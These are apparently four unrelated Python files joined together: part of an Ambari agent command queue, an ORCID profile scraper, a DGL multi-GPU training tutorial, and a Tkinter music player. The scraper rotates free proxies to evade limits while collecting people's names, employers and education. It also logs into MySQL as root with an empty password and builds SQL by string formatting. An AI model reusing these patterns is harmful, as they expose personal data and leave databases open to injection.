else:
self.commandQueue.put(command)
def interrupt(self):
self.commandQueue.put(None)
def cancel(self, commands):
for command in commands:
logger.info("Canceling command with taskId = {tid}".format(tid = str(command['target_task_id'])))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(pprint.pformat(command))
task_id = command['target_task_id']
reason = command['reason']
# Remove from the command queue by task_id
queue = self.commandQueue
self.commandQueue = Queue.Queue()
while not queue.empty():
queued_command = queue.get(False)
if queued_command['taskId'] != task_id:
self.commandQueue.put(queued_command)
else:
logger.info("Canceling {commandType} for service {serviceName} and role {role} with taskId {taskId}".format(
**queued_command
))
# Kill if in progress
self.customServiceOrchestrator.cancel_command(task_id, reason)
self.taskIdsToCancel.add(task_id)
self.cancelEvent.set()
def run(self):
while not self.stop_event.is_set():
try:
self.process_background_queue_safe_empty()
self.fill_recovery_commands()
try:
if self.parallel_execution == 0:
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command is None:
break
self.process_command(command)
else:
# If parallel execution is enabled, just kick off all available
# commands using separate threads
while not self.stop_event.is_set():
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command is None:
break
# If command is not retry_enabled then do not start them in parallel
# checking just one command is enough as all commands for a stage is sent
# at the same time and retry is only enabled for initial start/install
retry_able = False
if 'commandParams' in command and 'command_retry_enabled' in command['commandParams']:
retry_able = command['commandParams']['command_retry_enabled'] == "true"
if retry_able:
logger.info("Kicking off a thread for the command, id={} taskId={}".format(command['commandId'], command['taskId']))
t = threading.Thread(target=self.process_command, args=(command,))
t.daemon = True
t.start()
else:
self.process_command(command)
break
pass
pass
except Queue.Empty:
pass
except Exception:
logger.exception("ActionQueue thread failed with exception. Re-running it")
logger.info("ActionQueue thread has successfully finished")
def fill_recovery_commands(self):
if self.recovery_manager.enabled() and not self.tasks_in_progress_or_pending():
self.put(self.recovery_manager.get_recovery_commands())
def process_background_queue_safe_empty(self):
while not self.backgroundCommandQueue.empty():
try:
command = self.backgroundCommandQueue.get(False)
if "__handle" in command and command["__handle"].status is None:
self.process_command(command)
except Queue.Empty:
pass
def create_command_handle(self, command):
if "__handle" in command:
raise AgentException("Command already has __handle")
command['__handle'] = BackgroundCommandExecutionHandle(command, command['commandId'], None, self.on_background_command_complete_callback)
return command
def process_command(self, command):
# make sure we log failures
command_type = command['commandType']
logger.debug("Took an element of Queue (command type = %s).", command_type)
try:
if command_type in AgentCommand.AUTO_EXECUTION_COMMAND_GROUP:
try:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_start()
self.recovery_manager.process_execution_command(command)
self.execute_command(command)
finally:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_finish()
else:
logger.error("Unrecognized command %s", pprint.pformat(command))
except Exception:
logger.exception("Exception while processing {0} command".format(command_type))
def tasks_in_progress_or_pending(self):
return not self.commandQueue.empty() or self.recovery_manager.has_active_command()
def execute_command(self, command):
"""
Executes commands of type EXECUTION_COMMAND
"""
cluster_id = command['clusterId']
command_id = command['commandId']
command_type = command['commandType']
num_attempts = 0
retry_duration = 0 # even with 0 allow one attempt
retry_able = False
delay = 1
log_command_output = True
command_canceled = False
command_result = {}
message = "Executing command with id = {commandId}, taskId = {taskId} for role = {role} of " \
"cluster_id {cluster}.".format(commandId=str(command_id), taskId=str(command['taskId']),
role=command['role'], cluster=cluster_id)
logger.info(message)
taskId = command['taskId']
# Preparing 'IN_PROGRESS' report
in_progress_status = self.commandStatuses.generate_report_template(command)
# The path of the files that contain the output log and error log use a prefix that the agent advertises to the
# server. The prefix is defined in agent-config.ini
if command_type != AgentCommand.auto_execution:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'errors-' + str(taskId) + '.txt',
'structuredOut': self.tmpdir + os.sep + 'structured-out-' + str(taskId) + '.json',
'status': CommandStatus.in_progress
})
else:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'auto_output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'auto_errors-' + str(taskId) + '.txt',
'structuredOut': self.tmpdir + os.sep + 'auto_structured-out-' + str(taskId) + '.json',
'status': CommandStatus.in_progress
})
self.commandStatuses.put_command_status(command, in_progress_status)
if 'commandParams' in command:
if 'max_duration_for_retries' in command['commandParams']:
retry_duration = int(command['commandParams']['max_duration_for_retries'])
if 'command_retry_enabled' in command['commandParams'] and command_type != AgentCommand.auto_execution:
# for AgentCommand.auto_execution command retry_able should be always false
retry_able = command['commandParams']['command_retry_enabled'] == "true"
if 'log_output' in command['commandParams']:
log_command_output = command['commandParams']['log_output'] != "false"
logger.info("Command execution metadata - taskId = {taskId}, retry enabled = {retryAble}, max retry duration (sec)"
" = {retryDuration}, log_output = {log_command_output}".format(
taskId=taskId, retryAble=retry_able, retryDuration=retry_duration, log_command_output=log_command_output))
self.cancelEvent.clear()
# for case of command reschedule (e.g. command and cancel for the same taskId are send at the same time)
self.taskIdsToCancel.discard(taskId)
while retry_duration >= 0:
if taskId in self.taskIdsToCancel:
logger.info('Command with taskId = {0} canceled'.format(taskId))
command_canceled = True
self.taskIdsToCancel.discard(taskId)
break
num_attempts += 1
start = 0
if retry_able:
start = int(time.time())
# running command
command_result = self.customServiceOrchestrator.runCommand(command,
in_progress_status['tmpout'],
in_progress_status['tmperr'],
override_output_files=num_attempts == 1,
retry=num_attempts > 1)
end = 1
if retry_able:
end = int(time.time())
retry_duration -= (end - start)
# dumping results
if command_type == AgentCommand.background_execution:
logger.info("Command is background command, quit retrying. Exit code: {exitCode}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, exitCode=command_result['exitcode'], retryAble=retry_able, retryDuration=retry_duration, delay=delay))
return
else:
if command_result['exitcode'] == 0:
status = CommandStatus.completed
else:
status = CommandStatus.failed
if (command_result['exitcode'] == -signal.SIGTERM) or (command_result['exitcode'] == -signal.SIGKILL):
logger.info('Command with taskId = {cid} was canceled!'.format(cid=taskId))
command_canceled = True
self.taskIdsToCancel.discard(taskId)
break
if status != CommandStatus.completed and retry_able and retry_duration > 0:
delay = self.get_retry_delay(delay)
if delay > retry_duration:
delay = retry_duration
retry_duration -= delay # allow one last attempt
command_result['stderr'] += "\n\nCommand failed. Retrying command execution ...\n\n"
logger.info("Retrying command with taskId = {cid} after a wait of {delay}".format(cid=taskId, delay=delay))
if 'agentLevelParams' not in command:
command['agentLevelParams'] = {}
command['agentLevelParams']['commandBeingRetried'] = "true"
self.cancelEvent.wait(delay) # wake up if something was canceled
continue
else:
logger.info("Quit retrying for command with taskId = {cid}. Status: {status}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, status=status, retryAble=retry_able, retryDuration=retry_duration, delay=delay))
break
self.taskIdsToCancel.discard(taskId)
# do not fail task which was rescheduled from server
if command_canceled:
with self.lock, self.commandQueue.mutex:
for com in self.commandQueue.queue:
if com['taskId'] == command['taskId']:
logger.info("Command with taskId = {cid} was rescheduled by server. "
"Fail report on cancelled command won't be sent with heartbeat.".format(cid=taskId))
self.commandStatuses.delete_command_data(command['taskId'])
return
# final result to stdout
command_result['stdout'] += '\n\nCommand completed successfully!\n' if status == CommandStatus.completed else '\n\nCommand failed after ' + str(num_attempts) + ' tries\n'
logger.info('Command with taskId = {cid} completed successfully!'.format(cid=taskId) if status == CommandStatus.completed else 'Command with taskId = {cid} failed after {attempts} tries'.format(cid=taskId, attempts=num_attempts))
role_result = self.commandStatuses.generate_report_template(command)
role_result.update({
'stdout': command_result['stdout'],
'stderr': command_result['stderr'],
'exitCode': command_result['exitcode'],
'status': status,
})
if self.config.has_option("logging", "log_command_executes") \
and int(self.config.get("logging", "log_command_executes")) == 1 \
and log_command_output:
if role_result['stdout'] != '':
logger.info("Begin command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(role_result['stdout'], str(command['taskId']))
logger.info("End command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if role_result['stderr'] != '':
logger.info("Begin command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(role_result['stderr'], str(command['taskId']))
logger.info("End command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if role_result['stdout'] == '':
role_result['stdout'] = 'None'
if role_result['stderr'] == '':
role_result['stderr'] = 'None'
# let ambari know name of custom command
if 'commandParams' in command and command['commandParams'].has_key('custom_command'):
role_result['customCommand'] = command['commandParams']['custom_command']
if 'structuredOut' in command_result:
role_result['structuredOut'] = str(json.dumps(command_result['structuredOut']))
else:
role_result['structuredOut'] = ''
self.recovery_manager.process_execution_command_result(command, status)
self.commandStatuses.put_command_status(command, role_result)
cluster_id = str(command['clusterId'])
if cluster_id != '-1' and cluster_id != 'null':
service_name = command['serviceName']
if service_name != 'null':
component_name = command['role']
self.component_status_executor.check_component_status(cluster_id, service_name, component_name, "STATUS", report=True)
def log_command_output(self, text, taskId):
"""
    Logs a message as multiple enumerated log messages, each of which is no larger than MAX_SYMBOLS_PER_LOG_MESSAGE.
    This is very useful for logging big messages when logs are redirected to syslog (syslog_enabled=1),
    since syslog usually truncates long messages.
"""
chunks = split_on_chunks(text, MAX_SYMBOLS_PER_LOG_MESSAGE)
if len(chunks) > 1:
for i in range(len(chunks)):
logger.info("Cmd log for taskId={0} and chunk {1}/{2} of log for command: \n".format(taskId, i+1, len(chunks)) + chunks[i])
else:
logger.info("Cmd log for taskId={0}: ".format(taskId) + text)
def get_retry_delay(self, last_delay):
"""
    Returns an exponentially growing delay. The idea is that if the number of retries is high, the underlying
    cause is probably a host- or environment-specific issue that requires longer waits.
"""
return last_delay * 2
def on_background_command_complete_callback(self, process_condensed_result, handle):
logger.debug('Start callback: %s', process_condensed_result)
logger.debug('The handle is: %s', handle)
status = CommandStatus.completed if handle.exitCode == 0 else CommandStatus.failed
aborted_postfix = self.customServiceOrchestrator.command_canceled_reason(handle.command['taskId'])
if aborted_postfix:
status = CommandStatus.failed
logger.debug('Set status to: %s , reason = %s', status, aborted_postfix)
else:
aborted_postfix = ''
role_result = self.commandStatuses.generate_report_template(handle.command)
role_result.update({
'stdout': process_condensed_result['stdout'] + aborted_postfix,
'stderr': process_condensed_result['stderr'] + aborted_postfix,
'exitCode': process_condensed_result['exitcode'],
'structuredOut': str(json.dumps(process_condensed_result['structuredOut'])) if 'structuredOut' in process_condensed_result else '',
'status': status,
})
self.commandStatuses.put_command_status(handle.command, role_result)
def reset(self):
with self.commandQueue.mutex:
self.commandQueue.queue.clear()
|
ip_proxies.py
|
# -*- coding: utf-8 -*-
"""
Four-process crawler that scrapes ORCID profile pages and stores the results in the "info" table.
@Author: lushaoxiao
@Date: 2019/3/31
@IDE: PyCharm
"""
import requests
from bs4 import BeautifulSoup
from random import choices
import multiprocessing as mp
import re
import os
import csv
import time
import random
import json
from mysql import connector
import uuid
# local proxy
local_proxies = {
    "http": "http://127.0.0.1:1080",
    "https": "http://127.0.0.1:1080",
}
# pool of overseas proxies
proxy_url = "http://free-proxy-list.net/"
# User-Agent
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# URL suffixes of the JSON endpoints appended to each profile URL
person = "/person.json"
affiliationGroups = "/affiliationGroups.json"
worksPage = "/worksPage.json?offset=0&sort=date&sortAsc=false"
# regex that matches qualifying urls
pattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\d')
# database settings
dbname = "orcid"
dbuser = "root"
dbpassword = ""
infoTableName = "info"
def get_proxies(size=1):
'''
    Look up HTTPS proxies. Requires access to the proxy-list site from behind the firewall, i.e. a local proxy (e.g. Shadowsocks) must be running.
    :param size: number of proxies wanted
    :return: dict of HTTPS proxies
'''
time.sleep(random.random() * 5)
flag = False
while not flag:
        # keep trying until the proxy-list page is fetched
try:
req = requests.get(proxy_url, headers=headers, proxies=local_proxies, timeout=10)
flag = True
except:
print("网络超时……")
pass
soup = BeautifulSoup(req.content, "html.parser")
all_tr = soup.find_all("tr")[1:]
proxies_list = list()
for item in all_tr:
try:
ip = item.find_all("td")[0].string
port = item.find_all("td")[1].string
https = item.find_all("td")[6].string
if https == "yes":
lt = list([ip, port])
proxies_list.append(lt)
except:
break
    # pick the IP and port at random to avoid overusing a single proxy address
if len(proxies_list) >= size:
return dict(choices(proxies_list, k=size))
elif len(proxies_list) >= 1:
return dict(choices(proxies_list, k=len(proxies_list)))
def start_crawl(start):
'''
    Crawl ORCID records starting from the given offset.
    :param start: offset used to build the search url
    :return: nothing
'''
proxy = get_proxies()
for ip, port in proxy.items():
print("{}使用代理为:{}:{}".format(mp.current_process().name, ip, port))
break
i = 0
    # base time for the randomized wait
    basetime = 0.5
    # how many rows to crawl per request
    rows = 25
    # number of database writes so far
    writenum = 0
    # current attempt count
    cnt = 0
    # name of this worker process
    name = mp.current_process().name
    # deprecated: the original plan was to write csv files, but concurrent processes cannot safely write the same file
# if not os.path.exists(name+".csv"):
# with open(name+".csv",'w',newline='') as csvfile:
# fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
# writer.writeheader()
# with open(name+".csv",'a+',newline='') as csvfile:
# fieldnames = ['ORCIDiD', 'name', 'country', 'education', 'works']
# writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
print("{}进程第{}次尝试".format(name, i+1))
url = "https://pub.sandbox.orcid.org/v2.1/search/?q=orcid&start={}&rows={}".format(start, rows)
print(url)
# 开启数据库链接
cnx = connector.connect(user=dbuser, database=dbname, password=dbpassword)
cursor = cnx.cursor()
# 定义插入数据表语句
add_info = (
"INSERT INTO " + infoTableName +
"(uuid,id,name,affiliationName,city,country,education) "
"VALUES (%s,%s,%s,%s,%s,%s,%s)"
)
try:
req = requests.Session()
        try:
            # fetch the raw xml of the search results
            req = requests.get(url, proxies=proxy, headers=headers, timeout=10)
        except:
            print("Process {} could not fetch the xml".format(name))
req.raise_for_status()
if req.status_code == 200:
req.encoding = "utf-8"
text = req.text
            # match every qualifying url
for uri in re.findall(pattern, text):
                # a qualifying url is 45 characters long
if len(uri) == 45:
try:
# person.json
data = requests.get(uri + person, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
persondata = json.loads(data.text)
personname = persondata['displayName']
countryname = None
if persondata['countryNames'] is not None:
country = dict(persondata['countryNames'])
for key in country:
countryname = country[key]
break
# worksPage.json?offset=0&sort=date&sortAsc=false
# work = requests.get(uri+worksPage, headers=headers, proxies=proxy, timeout=10)
# time.sleep(basetime + random.random() * 1.2)
# workdata = json.loads(work.text)
# worknum = workdata['totalGroups']
# affiliationGroups.json
education = requests.get(uri + affiliationGroups, headers=headers, proxies=proxy, timeout=10)
time.sleep(basetime + random.random() * 1.2)
edudata = json.loads(education.text)
eduname = None
affiliationName = None
city = None
try:
eduname = edudata['affiliationGroups']['EDUCATION'][0]['affiliations'][0]['affiliationName']['value']
except:
pass
try:
affiliationName = edudata['affiliationGroups']['EMPLOYMENT'][
len(edudata['affiliationGroups']['EMPLOYMENT']) - 1]['affiliations'][0][
'affiliationName']['value']
except:
pass
try:
city = edudata['affiliationGroups']['EMPLOYMENT'][
len(edudata['affiliationGroups']['EMPLOYMENT']) - 1]['affiliations'][0]['city'][
'value']
except:
# print("未找到edu信息")
pass
# print("ORCIDiD:{};name:{},country:{},education:{},works:{}".format(uri,personname,countryname,eduname,worknum))
# writer.writerow({'ORCIDiD':uri,'name':personname,'country':countryname,'education':eduname,'works':worknum})
                    # the primary key must be unique
uid = uuid.uuid4()
                    # build the row of values
add_value = [str(uid), uri, personname, affiliationName, city, countryname, eduname]
                    # execute the database insert
cursor.execute(add_info, add_value)
cnx.commit()
print("进程{}已成功写入{}次".format(name, writenum))
writenum += 1
except:
print("当前状态码:{}".format(data.status_code))
print("进程{}:url error {} times.".format(mp.current_process().name, cnt + 1))
cnt += 1
        else:
            print("The search url returned a bad response")
    except:
        print("Process {} has run {} times; an error occurred midway, restarting....".format(name, i))
        i -= 1
    finally:
        i += 1
    # close the database connection
cursor.close()
cnx.close()
print("{}进程数据库写入完成".format(name))
def delete_duplicated_id(tbname=None):
'''
    Used afterwards to remove duplicate ids from the MySQL table.
    :param tbname: name of the table to clean up
    :return:
'''
if tbname is None:
raise RuntimeError("清除id错误,您未指定数据库名")
cnx = connector.connect(user=dbuser, database=dbname, password=dbpassword)
query = "SELECT id FROM " + tbname + " GROUP BY id HAVING COUNT(*) > 1"
cursor = cnx.cursor()
cursor.execute(query)
records = cursor.fetchall()
cnt = 1
for item in records:
id = item[0]
sql = "SELECT uuid FROM " + tbname + " WHERE id = \"{}\"".format(id)
cursor.execute(sql)
data = cursor.fetchall()
uid = data[0][0]
delete_sql = "DELETE FROM " + tbname + " WHERE id = \"{}\" AND uuid != \"{}\"".format(id, uid)
cursor.execute(delete_sql)
print("已执行{}次".format(cnt))
cnt += 1
cnx.commit()
cursor.close()
cnx.close()
if __name__ == '__main__':
size = mp.cpu_count()
start = [x for x in range(0, 10)]
    # counts completed passes over the full task
cnt = 0
for ind in start:
        # run four crawler processes concurrently
p1 = mp.Process(target=start_crawl, args=(ind * 100,), name="p1")
p2 = mp.Process(target=start_crawl, args=(ind * 100 + 25,), name="p2")
p3 = mp.Process(target=start_crawl, args=(ind * 100 + 50,), name="p3")
p4 = mp.Process(target=start_crawl, args=(ind * 100 + 75,), name="p4")
p1.start()
p2.start()
p3.start()
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
p1.terminate()
p2.terminate()
p3.terminate()
p4.terminate()
|
1_graph_classification.py
|
"""
Single Machine Multi-GPU Minibatch Graph Classification
=======================================================
In this tutorial, you will learn how to use multiple GPUs in training a
graph neural network (GNN) for graph classification. This tutorial assumes
knowledge in GNNs for graph classification and we recommend you to check
:doc:`Training a GNN for Graph Classification <../blitz/5_graph_classification>` otherwise.
(Time estimate: 8 minutes)
To use a single GPU in training a GNN, we need to put the model, graph(s), and other
tensors (e.g. labels) on the same GPU:
"""
"""
import torch
# Use the first GPU
device = torch.device("cuda:0")
model = model.to(device)
graph = graph.to(device)
labels = labels.to(device)
"""
###############################################################################
# The node and edge features in the graphs, if any, will also be on the GPU.
# After that, the forward computation, backward computation and parameter
# update will take place on the GPU. For graph classification, this repeats
# for each minibatch gradient descent.
#
# Using multiple GPUs allows performing more computation per unit of time. It
# is like having a team work together, where each GPU is a team member. We need
# to distribute the computation workload across GPUs and let them synchronize
# the efforts regularly. PyTorch provides convenient APIs for this task with
# multiple processes, one per GPU, and we can use them in conjunction with DGL.
#
# Intuitively, we can distribute the workload along the dimension of data. This
# allows multiple GPUs to perform the forward and backward computation of
# multiple gradient descents in parallel. To distribute a dataset across
# multiple GPUs, we need to partition it into multiple mutually exclusive
# subsets of a similar size, one per GPU. We need to repeat the random
# partition every epoch to guarantee randomness. We can use
# :func:`~dgl.dataloading.pytorch.GraphDataLoader`, which wraps some PyTorch
# APIs and does the job for graph classification in data loading.
#
# Once all GPUs have finished the backward computation for their minibatches,
# we need to synchronize the model parameter update across them. Specifically,
# this involves collecting gradients from all GPUs, averaging them and updating
# the model parameters on each GPU. We can wrap a PyTorch model with
# :func:`~torch.nn.parallel.DistributedDataParallel` so that the model
# parameter update will invoke gradient synchronization first under the hood.
#
# .. image:: https://data.dgl.ai/tutorial/mgpu_gc.png
# :width: 450px
# :align: center
#
# That’s the core behind this tutorial. We will explore it more in detail with
# a complete example below.
#
# Distributed Process Group Initialization
# ----------------------------------------
#
# For communication between multiple processes in multi-gpu training, we need
# to start the distributed backend at the beginning of each process. We use
# `world_size` to refer to the number of processes and `rank` to refer to the
# process ID, which should be an integer from `0` to `world_size - 1`.
#
import torch.distributed as dist
def init_process_group(world_size, rank):
dist.init_process_group(
backend='nccl',
init_method='tcp://127.0.0.1:12345',
world_size=world_size,
rank=rank)
###############################################################################
# Data Loader Preparation
# -----------------------
#
# We split the dataset into training, validation and test subsets. In dataset
# splitting, we need to use a same random seed across processes to ensure a
# same split. We follow the common practice to train with multiple GPUs and
# evaluate with a single GPU, thus only set `use_ddp` to True in the
# :func:`~dgl.dataloading.pytorch.GraphDataLoader` for the training set, where
# `ddp` stands for :func:`~torch.nn.parallel.DistributedDataParallel`.
#
from dgl.data import split_dataset
from dgl.dataloading import GraphDataLoader
def get_dataloaders(dataset, seed, batch_size=32):
# Use a 80:10:10 train-val-test split
train_set, val_set, test_set = split_dataset(dataset,
frac_list=[0.8, 0.1, 0.1],
shuffle=True,
random_state=seed)
train_loader = GraphDataLoader(train_set, use_ddp=True, batch_size=batch_size, shuffle=True)
val_loader = GraphDataLoader(val_set, batch_size=batch_size)
test_loader = GraphDataLoader(test_set, batch_size=batch_size)
return train_loader, val_loader, test_loader
###############################################################################
# Model Initialization
# --------------------
#
# For this tutorial, we use a simplified Graph Isomorphism Network (GIN).
#
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn.pytorch import GINConv, SumPooling
class GIN(nn.Module):
def __init__(self, input_size=1, num_classes=2):
super(GIN, self).__init__()
self.conv1 = GINConv(nn.Linear(input_size, num_classes), aggregator_type='sum')
self.conv2 = GINConv(nn.Linear(num_classes, num_classes), aggregator_type='sum')
self.pool = SumPooling()
def forward(self, g, feats):
feats = self.conv1(g, feats)
feats = F.relu(feats)
feats = self.conv2(g, feats)
return self.pool(g, feats)
###############################################################################
# To ensure same initial model parameters across processes, we need to set the
# same random seed before model initialization. Once we construct a model
# instance, we wrap it with :func:`~torch.nn.parallel.DistributedDataParallel`.
#
import torch
from torch.nn.parallel import DistributedDataParallel
def init_model(seed, device):
torch.manual_seed(seed)
model = GIN().to(device)
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
return model
###############################################################################
# Main Function for Each Process
# -----------------------------
#
# Define the model evaluation function as in the single-GPU setting.
#
def evaluate(model, dataloader, device):
model.eval()
total = 0
total_correct = 0
for bg, labels in dataloader:
bg = bg.to(device)
labels = labels.to(device)
# Get input node features
feats = bg.ndata.pop('attr')
with torch.no_grad():
pred = model(bg, feats)
_, pred = torch.max(pred, 1)
total += len(labels)
total_correct += (pred == labels).sum().cpu().item()
return 1.0 * total_correct / total
###############################################################################
# Define the main function for each process.
#
from torch.optim import Adam
def main(rank, world_size, dataset, seed=0):
init_process_group(world_size, rank)
# Assume the GPU ID to be the same as the process ID
device = torch.device('cuda:{:d}'.format(rank))
torch.cuda.set_device(device)
model = init_model(seed, device)
criterion = nn.CrossEntropyLoss()
optimizer = Adam(model.parameters(), lr=0.01)
    train_loader, val_loader, test_loader = get_dataloaders(dataset, seed)
for epoch in range(5):
model.train()
# The line below ensures all processes use a different
# random ordering in data loading for each epoch.
train_loader.set_epoch(epoch)
total_loss = 0
for bg, labels in train_loader:
bg = bg.to(device)
labels = labels.to(device)
feats = bg.ndata.pop('attr')
pred = model(bg, feats)
loss = criterion(pred, labels)
total_loss += loss.cpu().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = total_loss
print('Loss: {:.4f}'.format(loss))
val_acc = evaluate(model, val_loader, device)
print('Val acc: {:.4f}'.format(val_acc))
test_acc = evaluate(model, test_loader, device)
print('Test acc: {:.4f}'.format(test_acc))
dist.destroy_process_group()
###############################################################################
# Finally we load the dataset and launch the processes.
#
if __name__ == '__main__':
import torch.multiprocessing as mp
from dgl.data import GINDataset
num_gpus = 4
procs = []
dataset = GINDataset(name='IMDBBINARY', self_loop=False)
for rank in range(num_gpus):
p = mp.Process(target=main, args=(rank, num_gpus, dataset))
p.start()
procs.append(p)
for p in procs:
p.join()
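###############################################################################
# .. note::
#
#    ``torch.multiprocessing.spawn(main, args=(num_gpus, dataset), nprocs=num_gpus)``
#    is an equivalent, more compact way to launch one process per GPU.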
|
GUI MUSIC PLAYER.py
|
""" Music Player
----------------------------------------
"""
import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
root.get_themes()  # Returns a list of all themes that can be set
root.set_theme("radiance")  # Sets an available theme
# Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
# MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
#
# Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)
# Create the menubar
menubar = Menu(root)
root.config(menu=menubar)
# Create the submenu
subMenu = Menu(menubar, tearoff=0)
playlist = []
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# Full path + filename is required to play the music inside the play_music load function
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
mixer.music.queue(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
    tkinter.messagebox.showinfo('About Melody', 'This is a music player built using Python Tkinter by @attreyabhatt')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)
mixer.init()  # initializing the mixer
paused = FALSE  # playback-paused flag used by play_music/pause_music/stop_music
root.title("Melody")
root.iconbitmap(r'images/melody.ico')
# Root Window - StatusBar, LeftFrame, RightFrame
# LeftFrame - The listbox (playlist)
# RightFrame - TopFrame, MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
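    # Work out the track length (mutagen for .mp3 files, pygame Sound otherwise),
    # show it on the length label and start the countdown thread.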
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
    # div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
    # mixer.music.get_busy() returns FALSE when we press the stop button (music stops playing)
    # continue - ignores all of the statements below it; we check whether the music is paused or not
current_time = 0
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes values only from 0 to 1. Example - 0, 0.1, 0.55, 0.54, 0.99, 1
muted = FALSE
def mute_music():
global muted
    if muted:  # unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
    else:  # mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)
# Bottom Frame for volume, rewind, mute etc.
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)
